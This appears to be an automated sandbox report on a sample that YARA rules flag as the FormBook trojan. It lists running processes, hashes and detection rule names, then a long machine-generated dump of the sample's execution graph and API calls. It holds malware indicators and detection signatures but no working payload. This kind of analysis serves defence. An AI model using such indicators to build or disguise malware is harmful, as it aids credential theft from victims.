            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:moderate
            Has exited:false

            Target ID:6
            Start time:13:15:31
            Start date:27/05/2024
            Path:C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe
            Wow64 process (32bit):true
            Commandline:"C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe"
            Imagebase:0x100000
            File size:140'800 bytes
            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            Reputation:high
            Has exited:false

            Target ID:9
            Start time:13:15:48
            Start date:27/05/2024
            Path:C:\Program Files\Mozilla Firefox\firefox.exe
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
            Imagebase:0x7ff79f9e0000
            File size:676'768 bytes
            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true


              Execution Graph

              Execution Coverage:3.9%
              Dynamic/Decrypted Code Coverage:1.5%
              Signature Coverage:3.6%
              Total number of Nodes:2000
              Total number of Limit Nodes:163
              [Execution graph: the interactive node/edge dump is not reproduced here. The graph's edges are labelled with the API calls reached from the sample's code, including GetPEB, Sleep, DecodePointer, EncodePointer, RaiseException, RtlAllocateHeap, RtlFreeHeap, GetProcessHeap, GetLastError, ReadFile, SetFilePointerEx, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetFullPathNameW, GetModuleFileNameW, GetModuleHandleExW, GetProcAddress, ExitProcess, GetStartupInfoW, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, GetCurrentThreadId, GetStdHandle and GetFileType.]
98856 1b4fb9 98851->98856 98853 1a8a15 __calloc_crt 58 API calls 98852->98853 98861 1b4fea __wsetenvp 98853->98861 98854 1b5041 98855 1a2f95 _free 58 API calls 98854->98855 98855->98856 98856->98785 98857 1a8a15 __calloc_crt 58 API calls 98857->98861 98858 1b5066 98859 1a2f95 _free 58 API calls 98858->98859 98859->98856 98861->98854 98861->98856 98861->98857 98861->98858 98862 1b507d 98861->98862 98920 1b4857 58 API calls ___strgtold12_l 98861->98920 98921 1a9006 IsProcessorFeaturePresent 98862->98921 98864 1b5089 98864->98785 98867 1a333b __IsNonwritableInCurrentImage 98865->98867 98944 1aa711 98867->98944 98868 1a3359 __initterm_e 98869 1a2f80 __cinit 67 API calls 98868->98869 98870 1a3378 _doexit __IsNonwritableInCurrentImage 98868->98870 98869->98870 98870->98789 98872 184948 98871->98872 98882 1849e7 98871->98882 98873 184982 IsThemeActive 98872->98873 98947 1a35ac 98873->98947 98877 1849ae 98959 184a5b SystemParametersInfoW SystemParametersInfoW 98877->98959 98879 1849ba 98960 183b4c 98879->98960 98881 1849c2 SystemParametersInfoW 98881->98882 98882->98793 98883->98767 98884->98771 98885->98778 98889->98794 98890->98797 98891->98803 98892->98805 98893->98810 98894->98809 98897 1a8a1c 98895->98897 98898 1a8a57 98897->98898 98900 1a8a3a 98897->98900 98904 1b5446 98897->98904 98898->98814 98901 1aa026 TlsSetValue 98898->98901 98900->98897 98900->98898 98912 1aa372 Sleep 98900->98912 98901->98817 98902->98821 98903->98818 98905 1b5451 98904->98905 98910 1b546c 98904->98910 98906 1b545d 98905->98906 98905->98910 98913 1a8d68 58 API calls __getptd_noexit 98906->98913 98908 1b547c HeapAlloc 98909 1b5462 98908->98909 98908->98910 98909->98897 98910->98908 98910->98909 98914 1a35e1 DecodePointer 98910->98914 98912->98900 98913->98909 98914->98910 98915->98838 98916->98831 98917->98828 98918->98845 98919->98850 98920->98861 98922 1a9011 98921->98922 98927 1a8e99 98922->98927 98926 1a902c 98926->98864 98928 1a8eb3 _memset __call_reportfault 98927->98928 98929 1a8ed3 
IsDebuggerPresent 98928->98929 98935 1aa395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98929->98935 98932 1a8f97 __call_reportfault 98936 1ac836 98932->98936 98933 1a8fba 98934 1aa380 GetCurrentProcess TerminateProcess 98933->98934 98934->98926 98935->98932 98937 1ac83e 98936->98937 98938 1ac840 IsProcessorFeaturePresent 98936->98938 98937->98933 98940 1b5b5a 98938->98940 98943 1b5b09 5 API calls 2 library calls 98940->98943 98942 1b5c3d 98942->98933 98943->98942 98945 1aa714 EncodePointer 98944->98945 98945->98945 98946 1aa72e 98945->98946 98946->98868 98948 1a9e4b __lock 58 API calls 98947->98948 98949 1a35b7 DecodePointer EncodePointer 98948->98949 99012 1a9fb5 LeaveCriticalSection 98949->99012 98951 1849a7 98952 1a3614 98951->98952 98953 1a3638 98952->98953 98954 1a361e 98952->98954 98953->98877 98954->98953 99013 1a8d68 58 API calls __getptd_noexit 98954->99013 98956 1a3628 99014 1a8ff6 9 API calls ___strgtold12_l 98956->99014 98958 1a3633 98958->98877 98959->98879 98961 183b59 __ftell_nolock 98960->98961 98962 1877c7 59 API calls 98961->98962 98963 183b63 GetCurrentDirectoryW 98962->98963 99015 183778 98963->99015 98965 183b8c IsDebuggerPresent 98966 183b9a 98965->98966 98967 1bd4ad MessageBoxA 98965->98967 98968 183c73 98966->98968 98970 1bd4c7 98966->98970 98971 183bb7 98966->98971 98967->98970 98969 183c7a SetCurrentDirectoryW 98968->98969 98974 183c87 Mailbox 98969->98974 99225 187373 59 API calls Mailbox 98970->99225 99096 1873e5 98971->99096 98974->98881 98975 1bd4d7 98980 1bd4ed SetCurrentDirectoryW 98975->98980 98977 183bd5 GetFullPathNameW 98978 187d2c 59 API calls 98977->98978 98979 183c10 98978->98979 99112 190a8d 98979->99112 98980->98974 98983 183c2e 98984 183c38 98983->98984 99226 1e4c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98983->99226 99128 183a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98984->99128 98988 1bd50a 98988->98984 98990 1bd51b 98988->98990 98992 184864 61 API calls 98990->98992 98991 
183c42 98993 183c55 98991->98993 99136 1843db 98991->99136 98994 1bd523 98992->98994 99147 190b30 98993->99147 98997 187f41 59 API calls 98994->98997 98999 1bd530 98997->98999 99000 1bd53a 98999->99000 99001 1bd55f 98999->99001 99003 187e0b 59 API calls 99000->99003 99004 187e0b 59 API calls 99001->99004 99005 1bd545 99003->99005 99006 1bd55b GetForegroundWindow ShellExecuteW 99004->99006 99227 187c8e 99005->99227 99009 1bd58f Mailbox 99006->99009 99009->98968 99012->98951 99013->98956 99014->98958 99016 1877c7 59 API calls 99015->99016 99017 18378e 99016->99017 99236 183d43 99017->99236 99019 1837ac 99020 184864 61 API calls 99019->99020 99021 1837c0 99020->99021 99022 187f41 59 API calls 99021->99022 99023 1837cd 99022->99023 99250 184f3d 99023->99250 99026 1bd3ae 99313 1e97e5 99026->99313 99027 1837ee Mailbox 99031 1881a7 59 API calls 99027->99031 99030 1bd3cd 99033 1a2f95 _free 58 API calls 99030->99033 99034 183801 99031->99034 99036 1bd3da 99033->99036 99274 1893ea 99034->99274 99037 184faa 84 API calls 99036->99037 99039 1bd3e3 99037->99039 99043 183ee2 59 API calls 99039->99043 99040 187f41 59 API calls 99041 18381a 99040->99041 99042 188620 69 API calls 99041->99042 99044 18382c Mailbox 99042->99044 99045 1bd3fe 99043->99045 99046 187f41 59 API calls 99044->99046 99047 183ee2 59 API calls 99045->99047 99048 183852 99046->99048 99049 1bd41a 99047->99049 99050 188620 69 API calls 99048->99050 99051 184864 61 API calls 99049->99051 99053 183861 Mailbox 99050->99053 99052 1bd43f 99051->99052 99054 183ee2 59 API calls 99052->99054 99055 1877c7 59 API calls 99053->99055 99056 1bd44b 99054->99056 99058 18387f 99055->99058 99057 1881a7 59 API calls 99056->99057 99059 1bd459 99057->99059 99277 183ee2 99058->99277 99061 183ee2 59 API calls 99059->99061 99063 1bd468 99061->99063 99069 1881a7 59 API calls 99063->99069 99065 183899 99065->99039 99066 1838a3 99065->99066 99067 1a313d _W_store_winword 60 API calls 99066->99067 99068 1838ae 99067->99068 99068->99045 99070 
1838b8 99068->99070 99071 1bd48a 99069->99071 99072 1a313d _W_store_winword 60 API calls 99070->99072 99073 183ee2 59 API calls 99071->99073 99074 1838c3 99072->99074 99075 1bd497 99073->99075 99074->99049 99076 1838cd 99074->99076 99075->99075 99077 1a313d _W_store_winword 60 API calls 99076->99077 99078 1838d8 99077->99078 99078->99063 99079 183919 99078->99079 99081 183ee2 59 API calls 99078->99081 99079->99063 99080 183926 99079->99080 99293 18942e 99080->99293 99082 1838fc 99081->99082 99084 1881a7 59 API calls 99082->99084 99086 18390a 99084->99086 99088 183ee2 59 API calls 99086->99088 99088->99079 99091 1893ea 59 API calls 99093 183961 99091->99093 99092 189040 60 API calls 99092->99093 99093->99091 99093->99092 99094 183ee2 59 API calls 99093->99094 99095 1839a7 Mailbox 99093->99095 99094->99093 99095->98965 99097 1873f2 __ftell_nolock 99096->99097 99098 1bee4b _memset 99097->99098 99099 18740b 99097->99099 99101 1bee67 GetOpenFileNameW 99098->99101 99100 1848ae 60 API calls 99099->99100 99102 187414 99100->99102 99103 1beeb6 99101->99103 100093 1a09d5 99102->100093 99105 187d2c 59 API calls 99103->99105 99107 1beecb 99105->99107 99107->99107 99109 187429 100111 1869ca 99109->100111 99113 190a9a __ftell_nolock 99112->99113 100406 186ee0 99113->100406 99115 190a9f 99127 183c26 99115->99127 100417 1912fe 89 API calls 99115->100417 99117 190aac 99117->99127 100418 194047 91 API calls Mailbox 99117->100418 99119 190ab5 99120 190ab9 GetFullPathNameW 99119->99120 99119->99127 99121 187d2c 59 API calls 99120->99121 99122 190ae5 99121->99122 99123 187d2c 59 API calls 99122->99123 99124 190af2 99123->99124 99125 187d2c 59 API calls 99124->99125 99126 1c50d5 _wcscat 99124->99126 99125->99127 99127->98975 99127->98983 99129 1bd49c 99128->99129 99130 183ac2 LoadImageW RegisterClassExW 99128->99130 100462 1848fe LoadImageW EnumResourceNamesW 99129->100462 100461 183041 7 API calls 99130->100461 99133 183b46 99135 1839e7 CreateWindowExW CreateWindowExW ShowWindow 
ShowWindow 99133->99135 99134 1bd4a5 99135->98991 99137 184406 _memset 99136->99137 100463 184213 99137->100463 99140 18448b 99148 1c50ed 99147->99148 99162 190b55 99147->99162 100551 1ea0b5 89 API calls 4 library calls 99148->100551 99222 190b65 Mailbox 99162->99222 100552 189fbd 60 API calls 99162->100552 100553 1d68bf 341 API calls 99162->100553 99201 18a000 314 API calls 99201->99222 99207 1910f5 99208 190fee Mailbox 99208->99207 99208->99222 99209 1ea0b5 89 API calls 99209->99222 99210 188620 69 API calls 99210->99222 99212 188b13 69 API calls 99212->99222 99213 189df0 59 API calls Mailbox 99213->99222 99215 1d66f4 59 API calls Mailbox 99215->99222 99222->99201 99222->99207 99222->99208 99222->99209 99222->99210 99222->99212 99222->99213 99222->99215 99225->98975 99226->98988 99237 183d50 __ftell_nolock 99236->99237 99238 187d2c 59 API calls 99237->99238 99244 183eb6 Mailbox 99237->99244 99240 183d82 99238->99240 99249 183db8 Mailbox 99240->99249 99354 187b52 99240->99354 99241 187b52 59 API calls 99241->99249 99242 183e89 99243 187f41 59 API calls 99242->99243 99242->99244 99246 183eaa 99243->99246 99244->99019 99245 187f41 59 API calls 99245->99249 99247 183f84 59 API calls 99246->99247 99247->99244 99248 183f84 59 API calls 99248->99249 99249->99241 99249->99242 99249->99244 99249->99245 99249->99248 99357 184d13 99250->99357 99255 184f68 LoadLibraryExW 99367 184cc8 99255->99367 99256 1bdd0f 99258 184faa 84 API calls 99256->99258 99259 1bdd16 99258->99259 99261 184cc8 3 API calls 99259->99261 99263 1bdd1e 99261->99263 99393 18506b 99263->99393 99264 184f8f 99264->99263 99265 184f9b 99264->99265 99267 184faa 84 API calls 99265->99267 99269 1837e6 99267->99269 99269->99026 99269->99027 99271 1bdd45 99401 185027 99271->99401 99273 1bdd52 99275 1a0ff6 Mailbox 59 API calls 99274->99275 99276 18380d 99275->99276 99276->99040 99278 183eec 99277->99278 99279 183f05 99277->99279 99280 1881a7 59 API calls 99278->99280 99281 187d2c 59 API calls 99279->99281 99282 
18388b 99280->99282 99281->99282 99283 1a313d 99282->99283 99284 1a3149 99283->99284 99285 1a31be 99283->99285 99292 1a316e 99284->99292 99828 1a8d68 58 API calls __getptd_noexit 99284->99828 99830 1a31d0 60 API calls 3 library calls 99285->99830 99288 1a31cb 99288->99065 99289 1a3155 99829 1a8ff6 9 API calls ___strgtold12_l 99289->99829 99291 1a3160 99291->99065 99292->99065 99294 189436 99293->99294 99295 1a0ff6 Mailbox 59 API calls 99294->99295 99296 189444 99295->99296 99297 183936 99296->99297 99831 18935c 59 API calls Mailbox 99296->99831 99299 1891b0 99297->99299 99832 1892c0 99299->99832 99301 1a0ff6 Mailbox 59 API calls 99303 183944 99301->99303 99302 1891bf 99302->99301 99302->99303 99304 189040 99303->99304 99305 1bf5a5 99304->99305 99312 189057 99304->99312 99305->99312 99842 188d3b 59 API calls Mailbox 99305->99842 99307 189158 99310 1a0ff6 Mailbox 59 API calls 99307->99310 99308 1891a0 99841 189e9c 60 API calls Mailbox 99308->99841 99311 18915f 99310->99311 99311->99093 99312->99307 99312->99308 99312->99311 99314 185045 85 API calls 99313->99314 99315 1e9854 99314->99315 99843 1e99be 99315->99843 99318 18506b 74 API calls 99319 1e9881 99318->99319 99320 18506b 74 API calls 99319->99320 99321 1e9891 99320->99321 99322 18506b 74 API calls 99321->99322 99323 1e98ac 99322->99323 99324 18506b 74 API calls 99323->99324 99325 1e98c7 99324->99325 99326 185045 85 API calls 99325->99326 99327 1e98de 99326->99327 99328 1a594c _W_store_winword 58 API calls 99327->99328 99329 1e98e5 99328->99329 99330 1a594c _W_store_winword 58 API calls 99329->99330 99331 1e98ef 99330->99331 99332 18506b 74 API calls 99331->99332 99333 1e9903 99332->99333 99334 1e9393 GetSystemTimeAsFileTime 99333->99334 99335 1e9916 99334->99335 99336 1e992b 99335->99336 99337 1e9940 99335->99337 99340 1a2f95 _free 58 API calls 99336->99340 99338 1e9946 99337->99338 99339 1e99a5 99337->99339 99849 1e8d90 99338->99849 99342 1a2f95 _free 58 API calls 99339->99342 99343 1e9931 99340->99343 99347 
1bd3c1 99342->99347 99345 1a2f95 _free 58 API calls 99343->99345 99345->99347 99346 1a2f95 _free 58 API calls 99346->99347 99347->99030 99348 184faa 99347->99348 99349 184fbb 99348->99349 99350 184fb4 99348->99350 99352 184fca 99349->99352 99353 184fdb FreeLibrary 99349->99353 99351 1a55d6 __fcloseall 83 API calls 99350->99351 99351->99349 99352->99030 99353->99352 99355 187faf 59 API calls 99354->99355 99356 187b5d 99355->99356 99356->99240 99406 184d61 99357->99406 99360 184d3a 99361 184d4a FreeLibrary 99360->99361 99362 184d53 99360->99362 99361->99362 99364 1a548b 99362->99364 99363 184d61 2 API calls 99363->99360 99410 1a54a0 99364->99410 99366 184f5c 99366->99255 99366->99256 99568 184d94 99367->99568 99370 184ced 99371 184d08 99370->99371 99372 184cff FreeLibrary 99370->99372 99374 184dd0 99371->99374 99372->99371 99373 184d94 2 API calls 99373->99370 99375 1a0ff6 Mailbox 59 API calls 99374->99375 99376 184de5 99375->99376 99377 18538e 59 API calls 99376->99377 99378 184df1 _memmove 99377->99378 99379 184e2c 99378->99379 99381 184ee9 99378->99381 99382 184f21 99378->99382 99380 185027 69 API calls 99379->99380 99386 184e35 99380->99386 99572 184fe9 CreateStreamOnHGlobal 99381->99572 99583 1e9ba5 95 API calls 99382->99583 99385 18506b 74 API calls 99385->99386 99386->99385 99388 184ec9 99386->99388 99389 1bdcd0 99386->99389 99578 185045 99386->99578 99388->99264 99390 185045 85 API calls 99389->99390 99391 1bdce4 99390->99391 99392 18506b 74 API calls 99391->99392 99392->99388 99394 18507d 99393->99394 99395 1bddf6 99393->99395 99607 1a5812 99394->99607 99398 1e9393 99805 1e91e9 99398->99805 99400 1e93a9 99400->99271 99402 185036 99401->99402 99404 1bddb9 99401->99404 99810 1a5e90 99402->99810 99405 18503e 99405->99273 99407 184d2e 99406->99407 99408 184d6a LoadLibraryA 99406->99408 99407->99360 99407->99363 99408->99407 99409 184d7b GetProcAddress 99408->99409 99409->99407 99413 1a54ac _doexit 99410->99413 99411 1a54bf 99459 1a8d68 58 API calls 
__getptd_noexit 99411->99459 99413->99411 99415 1a54f0 99413->99415 99414 1a54c4 99460 1a8ff6 9 API calls ___strgtold12_l 99414->99460 99429 1b0738 99415->99429 99418 1a54f5 99419 1a550b 99418->99419 99420 1a54fe 99418->99420 99422 1a5535 99419->99422 99423 1a5515 99419->99423 99461 1a8d68 58 API calls __getptd_noexit 99420->99461 99444 1b0857 99422->99444 99462 1a8d68 58 API calls __getptd_noexit 99423->99462 99425 1a54cf _doexit @_EH4_CallFilterFunc@8 99425->99366 99430 1b0744 _doexit 99429->99430 99431 1a9e4b __lock 58 API calls 99430->99431 99441 1b0752 99431->99441 99432 1b07c6 99464 1b084e 99432->99464 99433 1b07cd 99469 1a8a5d 58 API calls 2 library calls 99433->99469 99436 1b0843 _doexit 99436->99418 99437 1b07d4 99437->99432 99470 1aa06b InitializeCriticalSectionAndSpinCount 99437->99470 99438 1a9ed3 __mtinitlocknum 58 API calls 99438->99441 99441->99432 99441->99433 99441->99438 99467 1a6e8d 59 API calls __lock 99441->99467 99468 1a6ef7 LeaveCriticalSection LeaveCriticalSection _doexit 99441->99468 99442 1b07fa EnterCriticalSection 99442->99432 99453 1b0877 __wopenfile 99444->99453 99445 1b0891 99475 1a8d68 58 API calls __getptd_noexit 99445->99475 99447 1b0a4c 99447->99445 99451 1b0aaf 99447->99451 99448 1b0896 99476 1a8ff6 9 API calls ___strgtold12_l 99448->99476 99450 1a5540 99463 1a5562 LeaveCriticalSection LeaveCriticalSection _fprintf 99450->99463 99472 1b87f1 99451->99472 99453->99445 99453->99447 99453->99453 99477 1a3a0b 60 API calls 2 library calls 99453->99477 99455 1b0a45 99455->99447 99478 1a3a0b 60 API calls 2 library calls 99455->99478 99457 1b0a64 99457->99447 99479 1a3a0b 60 API calls 2 library calls 99457->99479 99459->99414 99460->99425 99461->99425 99462->99425 99463->99425 99471 1a9fb5 LeaveCriticalSection 99464->99471 99466 1b0855 99466->99436 99467->99441 99468->99441 99469->99437 99470->99442 99471->99466 99480 1b7fd5 99472->99480 99474 1b880a 99474->99450 99475->99448 99476->99450 99477->99455 99478->99457 99479->99447 99483 
1b7fe1 _doexit 99480->99483 99481 1b7ff7 99565 1a8d68 58 API calls __getptd_noexit 99481->99565 99483->99481 99485 1b802d 99483->99485 99484 1b7ffc 99566 1a8ff6 9 API calls ___strgtold12_l 99484->99566 99491 1b809e 99485->99491 99488 1b8049 99567 1b8072 LeaveCriticalSection __unlock_fhandle 99488->99567 99490 1b8006 _doexit 99490->99474 99492 1b80be 99491->99492 99493 1a471a __wsopen_nolock 58 API calls 99492->99493 99496 1b80da 99493->99496 99494 1a9006 __invoke_watson 8 API calls 99495 1b87f0 99494->99495 99497 1b7fd5 __wsopen_helper 103 API calls 99495->99497 99498 1b8114 99496->99498 99505 1b8137 99496->99505 99564 1b8211 99496->99564 99499 1b880a 99497->99499 99500 1a8d34 __close 58 API calls 99498->99500 99499->99488 99501 1b8119 99500->99501 99502 1a8d68 ___strgtold12_l 58 API calls 99501->99502 99503 1b8126 99502->99503 99506 1a8ff6 ___strgtold12_l 9 API calls 99503->99506 99504 1b81f5 99507 1a8d34 __close 58 API calls 99504->99507 99505->99504 99512 1b81d3 99505->99512 99508 1b8130 99506->99508 99509 1b81fa 99507->99509 99508->99488 99510 1a8d68 ___strgtold12_l 58 API calls 99509->99510 99511 1b8207 99510->99511 99513 1a8ff6 ___strgtold12_l 9 API calls 99511->99513 99514 1ad4d4 __alloc_osfhnd 61 API calls 99512->99514 99513->99564 99515 1b82a1 99514->99515 99516 1b82ab 99515->99516 99517 1b82ce 99515->99517 99519 1a8d34 __close 58 API calls 99516->99519 99518 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99517->99518 99529 1b82f0 99518->99529 99520 1b82b0 99519->99520 99521 1a8d68 ___strgtold12_l 58 API calls 99520->99521 99523 1b82ba 99521->99523 99522 1b836e GetFileType 99524 1b83bb 99522->99524 99525 1b8379 GetLastError 99522->99525 99527 1a8d68 ___strgtold12_l 58 API calls 99523->99527 99536 1ad76a __set_osfhnd 59 API calls 99524->99536 99528 1a8d47 __dosmaperr 58 API calls 99525->99528 99526 1b833c GetLastError 99530 1a8d47 __dosmaperr 58 API calls 99526->99530 99527->99508 99531 1b83a0 CloseHandle 99528->99531 99529->99522 
99529->99526 99532 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99529->99532 99533 1b8361 99530->99533 99531->99533 99534 1b83ae 99531->99534 99535 1b8331 99532->99535 99537 1a8d68 ___strgtold12_l 58 API calls 99533->99537 99538 1a8d68 ___strgtold12_l 58 API calls 99534->99538 99535->99522 99535->99526 99540 1b83d9 99536->99540 99537->99564 99539 1b83b3 99538->99539 99539->99533 99541 1b8594 99540->99541 99542 1b1b11 __lseeki64_nolock 60 API calls 99540->99542 99560 1b845a 99540->99560 99543 1b8767 CloseHandle 99541->99543 99541->99564 99544 1b8443 99542->99544 99545 1b7f4d ___createFile GetModuleHandleW GetProcAddress CreateFileW 99543->99545 99547 1a8d34 __close 58 API calls 99544->99547 99544->99560 99546 1b878e 99545->99546 99549 1b87c2 99546->99549 99550 1b8796 GetLastError 99546->99550 99547->99560 99548 1b10ab 70 API calls __read_nolock 99548->99560 99549->99564 99551 1a8d47 __dosmaperr 58 API calls 99550->99551 99553 1b87a2 99551->99553 99552 1b848c 99555 1b99f2 __chsize_nolock 82 API calls 99552->99555 99552->99560 99556 1ad67d __free_osfhnd 59 API calls 99553->99556 99554 1b0d2d __close_nolock 61 API calls 99554->99560 99555->99552 99556->99549 99557 1adac6 __write 78 API calls 99557->99560 99558 1b8611 99559 1b0d2d __close_nolock 61 API calls 99558->99559 99561 1b8618 99559->99561 99560->99541 99560->99548 99560->99552 99560->99554 99560->99557 99560->99558 99562 1b1b11 60 API calls __lseeki64_nolock 99560->99562 99563 1a8d68 ___strgtold12_l 58 API calls 99561->99563 99562->99560 99563->99564 99564->99494 99565->99484 99566->99490 99567->99490 99569 184ce1 99568->99569 99570 184d9d LoadLibraryA 99568->99570 99569->99370 99569->99373 99570->99569 99571 184dae GetProcAddress 99570->99571 99571->99569 99573 185003 FindResourceExW 99572->99573 99577 185020 99572->99577 99574 1bdd5c LoadResource 99573->99574 99573->99577 99575 1bdd71 SizeofResource 99574->99575 99574->99577 99576 1bdd85 LockResource 99575->99576 99575->99577 99576->99577 
99577->99379 99579 185054 99578->99579 99580 1bddd4 99578->99580 99584 1a5a7d 99579->99584 99582 185062 99582->99386 99583->99379 99585 1a5a89 _doexit 99584->99585 99586 1a5a9b 99585->99586 99587 1a5ac1 99585->99587 99597 1a8d68 58 API calls __getptd_noexit 99586->99597 99599 1a6e4e 99587->99599 99590 1a5aa0 99598 1a8ff6 9 API calls ___strgtold12_l 99590->99598 99591 1a5ac7 99605 1a59ee 83 API calls 5 library calls 99591->99605 99594 1a5ad6 99606 1a5af8 LeaveCriticalSection LeaveCriticalSection _fprintf 99594->99606 99596 1a5aab _doexit 99596->99582 99597->99590 99598->99596 99600 1a6e5e 99599->99600 99601 1a6e80 EnterCriticalSection 99599->99601 99600->99601 99602 1a6e66 99600->99602 99603 1a6e76 99601->99603 99604 1a9e4b __lock 58 API calls 99602->99604 99603->99591 99604->99603 99605->99594 99606->99596 99610 1a582d 99607->99610 99609 18508e 99609->99398 99611 1a5839 _doexit 99610->99611 99612 1a584f _memset 99611->99612 99613 1a587c 99611->99613 99614 1a5874 _doexit 99611->99614 99637 1a8d68 58 API calls __getptd_noexit 99612->99637 99615 1a6e4e __lock_file 59 API calls 99613->99615 99614->99609 99616 1a5882 99615->99616 99623 1a564d 99616->99623 99618 1a5869 99638 1a8ff6 9 API calls ___strgtold12_l 99618->99638 99626 1a5668 _memset 99623->99626 99629 1a5683 99623->99629 99624 1a5673 99735 1a8d68 58 API calls __getptd_noexit 99624->99735 99626->99624 99626->99629 99630 1a56c3 99626->99630 99639 1a58b6 LeaveCriticalSection LeaveCriticalSection _fprintf 99629->99639 99630->99629 99631 1a57d4 _memset 99630->99631 99640 1a4916 99630->99640 99647 1b10ab 99630->99647 99715 1b0df7 99630->99715 99737 1b0f18 58 API calls 3 library calls 99630->99737 99738 1a8d68 58 API calls __getptd_noexit 99631->99738 99636 1a5678 99736 1a8ff6 9 API calls ___strgtold12_l 99636->99736 99637->99618 99638->99614 99639->99614 99641 1a4920 99640->99641 99642 1a4935 99640->99642 99739 1a8d68 58 API calls __getptd_noexit 99641->99739 99642->99630 99644 1a4925 99740 1a8ff6 9 API calls 
___strgtold12_l 99644->99740 99646 1a4930 99646->99630 99648 1b10cc 99647->99648 99649 1b10e3 99647->99649 99750 1a8d34 58 API calls __getptd_noexit 99648->99750 99651 1b181b 99649->99651 99655 1b111d 99649->99655 99766 1a8d34 58 API calls __getptd_noexit 99651->99766 99652 1b10d1 99751 1a8d68 58 API calls __getptd_noexit 99652->99751 99657 1b1125 99655->99657 99663 1b113c 99655->99663 99656 1b1820 99767 1a8d68 58 API calls __getptd_noexit 99656->99767 99752 1a8d34 58 API calls __getptd_noexit 99657->99752 99659 1b1131 99768 1a8ff6 9 API calls ___strgtold12_l 99659->99768 99661 1b112a 99753 1a8d68 58 API calls __getptd_noexit 99661->99753 99664 1b1151 99663->99664 99666 1b116b 99663->99666 99668 1b1189 99663->99668 99695 1b10d8 99663->99695 99754 1a8d34 58 API calls __getptd_noexit 99664->99754 99666->99664 99672 1b1176 99666->99672 99755 1a8a5d 58 API calls 2 library calls 99668->99755 99670 1b1199 99673 1b11bc 99670->99673 99674 1b11a1 99670->99674 99741 1b5ebb 99672->99741 99758 1b1b11 60 API calls 3 library calls 99673->99758 99756 1a8d68 58 API calls __getptd_noexit 99674->99756 99675 1b128a 99677 1b1303 ReadFile 99675->99677 99682 1b12a0 GetConsoleMode 99675->99682 99680 1b17e3 GetLastError 99677->99680 99681 1b1325 99677->99681 99679 1b11a6 99757 1a8d34 58 API calls __getptd_noexit 99679->99757 99684 1b17f0 99680->99684 99685 1b12e3 99680->99685 99681->99680 99689 1b12f5 99681->99689 99686 1b1300 99682->99686 99687 1b12b4 99682->99687 99764 1a8d68 58 API calls __getptd_noexit 99684->99764 99697 1b12e9 99685->99697 99759 1a8d47 58 API calls 3 library calls 99685->99759 99686->99677 99687->99686 99690 1b12ba ReadConsoleW 99687->99690 99689->99697 99698 1b135a 99689->99698 99707 1b15c7 99689->99707 99690->99689 99692 1b12dd GetLastError 99690->99692 99691 1b17f5 99765 1a8d34 58 API calls __getptd_noexit 99691->99765 99692->99685 99695->99630 99696 1a2f95 _free 58 API calls 99696->99695 99697->99695 99697->99696 99699 1b13c6 ReadFile 99698->99699 99705 1b1447 
99698->99705 99701 1b13e7 GetLastError 99699->99701 99709 1b13f1 99699->99709 99701->99709 99702 1b1504 99711 1b14b4 MultiByteToWideChar 99702->99711 99762 1b1b11 60 API calls 3 library calls 99702->99762 99703 1b14f4 99761 1a8d68 58 API calls __getptd_noexit 99703->99761 99704 1b16cd ReadFile 99708 1b16f0 GetLastError 99704->99708 99714 1b16fe 99704->99714 99705->99697 99705->99702 99705->99703 99705->99711 99707->99697 99707->99704 99708->99714 99709->99698 99760 1b1b11 60 API calls 3 library calls 99709->99760 99711->99692 99711->99697 99714->99707 99763 1b1b11 60 API calls 3 library calls 99714->99763 99716 1b0e02 99715->99716 99720 1b0e17 99715->99720 99802 1a8d68 58 API calls __getptd_noexit 99716->99802 99718 1b0e07 99803 1a8ff6 9 API calls ___strgtold12_l 99718->99803 99721 1b0e4c 99720->99721 99729 1b0e12 99720->99729 99804 1b6234 58 API calls __malloc_crt 99720->99804 99723 1a4916 __filbuf 58 API calls 99721->99723 99724 1b0e60 99723->99724 99769 1b0f97 99724->99769 99726 1b0e67 99727 1a4916 __filbuf 58 API calls 99726->99727 99726->99729 99728 1b0e8a 99727->99728 99728->99729 99730 1a4916 __filbuf 58 API calls 99728->99730 99729->99630 99731 1b0e96 99730->99731 99731->99729 99732 1a4916 __filbuf 58 API calls 99731->99732 99733 1b0ea3 99732->99733 99734 1a4916 __filbuf 58 API calls 99733->99734 99734->99729 99735->99636 99736->99629 99737->99630 99738->99636 99739->99644 99740->99646 99742 1b5ed3 99741->99742 99743 1b5ec6 99741->99743 99745 1b5edf 99742->99745 99746 1a8d68 